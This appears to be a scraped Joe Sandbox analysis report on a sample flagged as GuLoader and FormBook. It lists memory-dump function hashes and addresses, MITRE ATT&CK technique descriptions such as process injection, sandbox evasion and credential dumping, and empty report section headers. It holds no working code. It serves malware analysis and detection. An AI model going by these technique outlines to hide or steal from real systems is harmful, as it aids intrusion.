LdrpCheckModule, xrefs: 1E919F24
Failed to allocated memory for shimmed module list, xrefs: 1E919F1C
minkernel\ntdll\ldrinit.c, xrefs: 1E919F2E

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-161242083
Opcode ID: 3c732b401bb2a524721acff42251abf68d39b7af26a8861e391dfbef9151fd81
Instruction ID: 85b598013651d358d2448a25c393deb2f12dab150e90cba5ac757a0000a11a65
Opcode Fuzzy Hash: 3c732b401bb2a524721acff42251abf68d39b7af26a8861e391dfbef9151fd81
Instruction Fuzzy Hash: F171BE74A042499FDB05DF68C890AAEB7F6FF84708F18466DE802EB355E730AD46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1E935B90, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E935C0F
RtlDebugPrintTimes.NTDLL ref: 1E935C31
RtlDebugPrintTimes.NTDLL ref: 1E935C3E

Strings

Wow64 Emulation Layer, xrefs: 1E935C09

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Wow64 Emulation Layer
API String ID: 3446177414-921169906
Opcode ID: 8a9779b77936d709f7e80b663a36317e8bba99cd6da6e7207084c04f89fd1fde
Instruction ID: bc3b4e6b1089beb7e32d916fe1d3c012bcd337d921a61a98c7cccc1e2e8e0d6b
Opcode Fuzzy Hash: 8a9779b77936d709f7e80b663a36317e8bba99cd6da6e7207084c04f89fd1fde
Instruction Fuzzy Hash: 7321F7B990015DBFEB029BA48D84DFF7B7DFF49299B140654FA01A2240EB30EE01DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1E8DEE48, Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c35b5c8876e87fcb1666956197b38c39bd9a379330fe326f760afbcb267188cc
Instruction ID: 334d5de6910d52b6bca45d495cbf0c4510ebf8ca9fd50bc3a81404120ee235bb
Opcode Fuzzy Hash: c35b5c8876e87fcb1666956197b38c39bd9a379330fe326f760afbcb267188cc
Instruction Fuzzy Hash: D9E10274D00749CFCB25CFAAC980A9DBBF6FF48314F104A6AE446A72A4D730A885DF10

Uniqueness

Uniqueness Score: -1.00%

Function 1E92EBD0, Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E92EC61
RtlDebugPrintTimes.NTDLL ref: 1E92EC89
RtlDebugPrintTimes.NTDLL ref: 1E92ED2C
RtlDebugPrintTimes.NTDLL ref: 1E92EDE0

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 3577419014406281db00ebc80ac2a4ec9fec04ba81fc58f9f39087e88b04d607
Instruction ID: 41df72a2d3e60a360b3a87d5a599b17b041d118d0044bd20ad47cdca7ce784be
Opcode Fuzzy Hash: 3577419014406281db00ebc80ac2a4ec9fec04ba81fc58f9f39087e88b04d607
Instruction Fuzzy Hash: CD712275E0022A9FDF06CFA4C884BEDBBB5BF48314F54462AE905BB258D734A901CF54

Uniqueness

Uniqueness Score: -1.00%

Function 1E92EE56, Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E92EEED
RtlDebugPrintTimes.NTDLL ref: 1E92EF12
RtlDebugPrintTimes.NTDLL ref: 1E92EFA4
RtlDebugPrintTimes.NTDLL ref: 1E92EFF8

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 6e903f89d774a8e7cdcdf6ba1127171fa02f3473f6a769eafb0723191d390889
Instruction ID: 8e0748d64d182366c6a5ca62509513fac4986041ce5f299f19474a673048847f
Opcode Fuzzy Hash: 6e903f89d774a8e7cdcdf6ba1127171fa02f3473f6a769eafb0723191d390889
Instruction Fuzzy Hash: B55132B2E1121A9FDF09CF95D880AEDBBB6BF88314F04822EE805BB254D7359940CF54

Uniqueness

Uniqueness Score: -1.00%

Function 1E8E7A4F, Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8E7A72
BaseThreadInitThunk.KERNEL32 ref: 1E8E7A7C
RtlDebugPrintTimes.NTDLL ref: 1E9247F8
RtlDebugPrintTimes.NTDLL ref: 1E92487B

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: a2b15276379ff87db1f2cf78fb4121e57a2f57ce2a9624a55964062a90362271
Instruction ID: b198efc23697de7da5c5f3158354c0751314f573068ce5749adddb57e1a544b2
Opcode Fuzzy Hash: a2b15276379ff87db1f2cf78fb4121e57a2f57ce2a9624a55964062a90362271
Instruction Fuzzy Hash: 2F31E279E14269EFCF15DFA8D884A9DBBB1BF88720F10462AE511B7294D7355900CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1E8B58E0, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

@, xrefs: 1E9108AE

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 0906a1972aaf8fcfcf51c48ba8caa364c05fc321963dcc55275830f10349ae8a
Instruction ID: acf76b2e07ccf47a08d1daa09b3de710dd2e71b7ca9a6eb1219dade3d095b5f2
Opcode Fuzzy Hash: 0906a1972aaf8fcfcf51c48ba8caa364c05fc321963dcc55275830f10349ae8a
Instruction Fuzzy Hash: 8A324674D142AACFDB21CF69C844BDDBBB6BB08304F0446E9D449A7391D775AA84CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1E8E4B79, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

0, xrefs: 1E8E4BE3
Flst, xrefs: 1E8E4BB6

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: f3ab83caccc48749af72545d14d412eaef2d758060ca0ebd567592f266a8fdfc
Instruction ID: 4a34c8c51880db264d4ad472193fb63e75de21af0e0629e119e44ccb73a3efb7
Opcode Fuzzy Hash: f3ab83caccc48749af72545d14d412eaef2d758060ca0ebd567592f266a8fdfc
Instruction Fuzzy Hash: AC51CCB1E1068A8FCB11CF99C48475DFBF6EF85714F54C62ED4499B688E7B09981CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1E8ADF21, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8ADFE0

Strings

0, xrefs: 1E8ADFC0
0, xrefs: 1E8ADFAB

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 564028cbeb4164221c0f68326661a71f3c1e9e63538209fdf7396bc3aac9230b
Instruction ID: 0e1a7a5f8e39c93208e956d95e0097eb3e309448b68dd43667f3a77321da4b14
Opcode Fuzzy Hash: 564028cbeb4164221c0f68326661a71f3c1e9e63538209fdf7396bc3aac9230b
Instruction Fuzzy Hash: 7E414CB16087469FC300CF29C484A5BBBE5BF89318F044A6EF588DB381D771EA45CB96

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Zr26f1rL6r.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Threatname: FormBook

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Function 023206A2, Relevance: 13.5, APIs: 2, Strings: 5, Instructions: 1270
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre